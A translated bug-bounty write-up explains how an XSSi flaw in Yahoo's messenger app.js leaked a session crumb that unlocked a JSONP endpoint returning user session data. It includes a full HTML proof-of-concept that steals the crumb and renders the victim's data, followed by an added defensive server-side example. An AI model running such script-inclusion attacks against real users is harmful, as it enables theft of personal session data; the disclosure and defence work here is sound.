Shulou (Shulou.com), SLTechnology News & Howtos > Network Security, 05/31 report, updated 2025-01-19
This article walks through how a Yahoo XSSi vulnerability was discovered and how it could be used to steal user information.
Finding a particular class of vulnerability depends on two things: awareness that the class exists, and how easy it is to hunt for. Cross-site script inclusion (XSSi) is not listed in the widely accepted OWASP Top 10 and there are no publicly available tools for it, yet its impact includes disclosure of personal stored data, bypass of token protection mechanisms and account hijacking. Because XSSi vulnerabilities are widespread and lack effective detection methods, the harm they cause keeps growing. Next I will share a Yahoo XSSi vulnerability I found that could be used to steal information from Yahoo users.
Clue
While participating in the Yahoo (YHOO) vulnerability testing program, I came across the following request while intercepting traffic with Burp Suite:
Once I saw that this was a JSONP endpoint, I immediately realized it might give rise to an XSSi (cross-site script inclusion) vulnerability. In Yahoo's website API, the .crumb value is a random string tied to the user's session and authentication state. I noticed that if the .crumb GET parameter in the request is invalid, the response looks like this:
Utilization
Now, I thought, if the victim's valid .crumb value could be stolen somehow, then the victim's account-specific information could be stolen as well. So I searched all requests containing a valid .crumb value in Burp Suite's captured traffic, and eventually found one in a dynamically generated JavaScript file at https://messenger.yahoo.com/embed/app.js. If you check this JavaScript file now, you will find that its logoutCrumb value has been removed and the issue fixed. When I first found it, the source code was as follows:
The principle of an XSSi vulnerability is this: it lets an attacker cross the normal origin boundary to steal particular kinds of data by using the src attribute of <script> tags to get around the same-origin policy (SOP). For these tags, browsers do not stop a web page from loading third-party resources, just as they allow third-party images and text. Therefore, to read the valid logoutCrumb value out of https://messenger.yahoo.com/embed/app.js and then place it in the link https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx to request the session information of the corresponding user, I wrote the following PoC code:

```html
<!DOCTYPE html>
<html>
<head>
  <title>Yahoo XSSi PoC</title>
  <!-- the dynamic script that exposed session.logoutCrumb via iris.initConfig -->
  <script src="https://messenger.yahoo.com/embed/app.js"></script>
</head>
<body>
  <h1>Yahoo XSSi PoC Proof of Concept</h1>
  Dataset 1: <div id="content1"></div>
  Dataset 2: <div id="content2"></div>
  <script>
    // JSONP callback invoked by the device_users response: it receives the
    // victim's session data and renders it into the page
    function processDeviceUsers(data) {
      document.getElementById("content1").innerHTML = JSON.stringify(data);
    }

    window.onload = function () {
      var config = {};
      var config_data = {};
      // app.js hands its configuration object (including session.logoutCrumb)
      // to config.merge(), so capture it there
      config.merge = function (data) { config_data = data; };
      iris.initConfig(config);
      document.getElementById("content2").innerHTML = JSON.stringify(config_data);

      // Use the captured crumb to load the JSONP endpoint as a script include
      var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;
      var s = document.createElement("script");
      s.setAttribute("src", src);
      document.body.appendChild(s);
    };
  </script>
</body>
</html>
```
The following is the result of the test:
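As an added, defender-side example (not part of the original write-up and not Yahoo's code), the following Node.js-style handler models a JSONP endpoint like device_users and shows the checks that close this class of leak: the callback name is restricted to a plain identifier so it cannot be used to inject script, per-user data is refused to cross-site <script> loads by inspecting the Fetch Metadata headers Sec-Fetch-Dest and Sec-Fetch-Site (with an X-Requested-With fallback for browsers that do not send them), and the crumb is still checked against the session. The request and session objects, the function names handleDeviceUsers, isValidCallback, isCrossSiteScriptInclude and hasSameOriginMarker, and the SESSION constant are all constructed for this example.

```javascript
// Added example, not from the original article: a JSONP endpoint serving
// per-user data with the checks that stop cross-site script inclusion.
// Requests are plain objects {headers, query}; SESSION stands in for the
// server-side session bound to the request's cookie (constructed data).

const SESSION = {
  crumb: 'constructed-crumb-value',
  deviceUsers: [{ id: 'u1', name: 'example' }],
};

// Only plain (optionally dotted) identifiers may name the callback, so a
// reflected callback parameter can never inject script into the response.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Fetch Metadata lets the server distinguish a <script src> load issued by
// another site from a same-origin XHR/fetch. A response carrying per-user
// data must refuse cross-site script includes outright. same-site (sibling
// subdomains) is allowed here because JSONP is normally shared across them;
// tighten to same-origin only if that sharing is not needed.
function isCrossSiteScriptInclude(headers) {
  const site = (headers['sec-fetch-site'] || '').toLowerCase();
  const dest = (headers['sec-fetch-dest'] || '').toLowerCase();
  return dest === 'script' && site === 'cross-site';
}

// Browsers without Fetch Metadata send no Sec-Fetch-* headers; then require
// a custom header that a cross-site <script> tag cannot attach but a
// same-origin XHR/fetch can.
function hasSameOriginMarker(headers) {
  return (headers['x-requested-with'] || '') === 'XMLHttpRequest';
}

function lowerCaseHeaders(headers) {
  return Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
}

// Returns {status, body} for a request against the modelled endpoint.
function handleDeviceUsers(req, session) {
  const headers = lowerCaseHeaders(req.headers || {});
  const query = req.query || {};
  const cb = query.callback;

  if (!isValidCallback(cb)) {
    return { status: 400, body: '{"error":"bad callback"}' };
  }
  if (isCrossSiteScriptInclude(headers)) {
    return { status: 403, body: '{"error":"cross-site script include refused"}' };
  }
  if (!('sec-fetch-dest' in headers) && !hasSameOriginMarker(headers)) {
    return { status: 403, body: '{"error":"missing same-origin marker"}' };
  }
  // Crumb check as in the article: the token must match the session.
  if (query['.crumb'] !== session.crumb) {
    return { status: 401, body: '{"error":"invalid crumb"}' };
  }
  const payload = JSON.stringify({ users: session.deviceUsers });
  return { status: 200, body: `${cb}(${payload});` };
}

// Stand-alone demonstration: a legitimate same-origin call and a cross-site
// script include, both using the constructed SESSION.
function demo() {
  const good = handleDeviceUsers({
    headers: { 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Dest': 'empty' },
    query: { callback: 'processDeviceUsers', '.crumb': SESSION.crumb },
  }, SESSION);
  const attack = handleDeviceUsers({
    headers: { 'Sec-Fetch-Site': 'cross-site', 'Sec-Fetch-Dest': 'script' },
    query: { callback: 'processDeviceUsers', '.crumb': SESSION.crumb },
  }, SESSION);
  return [good.status, attack.status];
}

console.log(demo());
```

The same reasoning applies to app.js in the article: a script file that any origin can include must never embed session-bound secrets such as logoutCrumb, because the Sec-Fetch checks above cannot protect a resource whose whole purpose is to be loaded by <script src>. Session-bound values belong in a same-origin fetch response that carries these checks, not in a script body.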